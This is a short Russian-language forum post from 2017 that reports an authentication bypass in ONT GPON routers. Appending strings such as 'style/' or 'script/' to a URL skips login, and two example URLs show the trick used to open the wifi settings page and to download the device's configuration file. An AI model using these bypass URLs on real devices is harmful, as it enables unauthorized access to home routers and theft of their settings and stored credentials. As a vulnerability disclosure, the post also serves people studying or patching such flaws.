Показать сообщение отдельно

  #3753  
Старый 17.07.2017, 22:35
Felis-Sapiens
Постоянный
Регистрация: 21.07.2015
Сообщений: 594
С нами: 5691926

Репутация: 171


По умолчанию

Нашёл заодно уязвимость в этих ONT GPON - обход авторизации при наличии в URL какой-либо из строк: "style/", "script/", "images/", "floid.html", "FLoidForm" и т.д.

Например:

Код:
http://2.133.252.l3/wifi.html?style/
или скачиваем конфиг:

Код:
http://2.133.252.l3/download/ont_config.dat?autorun
 
Ответить с цитированием